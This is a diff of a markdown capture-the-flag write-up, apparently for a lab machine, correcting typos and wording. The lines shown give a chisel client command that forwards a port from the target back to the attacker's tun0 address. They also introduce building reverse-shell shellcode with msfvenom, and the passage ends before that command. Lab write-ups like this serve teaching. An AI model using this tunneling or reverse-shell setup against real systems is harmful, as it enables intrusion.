0xZuk0/matrix/_posts/2020-08-22-Classified1-Writup.md

 `cmd.exe command : chisel.exe client <your tun0 IP address> 8000 R:8888:127.0.0.1:8888`

-`powershell.exe command : .\chisel.exe client <your run0 IP address 8000 R:8888:127.0.0.1:8888>`
+`powershell.exe command : ./chisel.exe client <your tun0 IP address 8000 R:8888:127.0.0.1:8888>`

 ![image](https://raw.githubusercontent.com/0xZuk0/matrix/master/assets/Buff/chiselclient.png)

-> **NOTE** : In the above image i am using powershell
+> **NOTE** : In the above image i am using powershell.
+You have to use cmd.exe command.

-### Creting Payload
+### Creating Payload

 Now's Let's create out shellcode to get a reverse shell in out machine.
-To create our shellcode we are going to use msfvenom.
+To create our shellcode we are going to use `msfvenom`.
 If you don't know about msfvenom [here](https://www.offensive-security.com/metasploit-unleashed/msfvenom/) is the link.
 In short msfvenom is a tool use to make shellcodes.
 So let's create out payload

 Enter the following command in your machine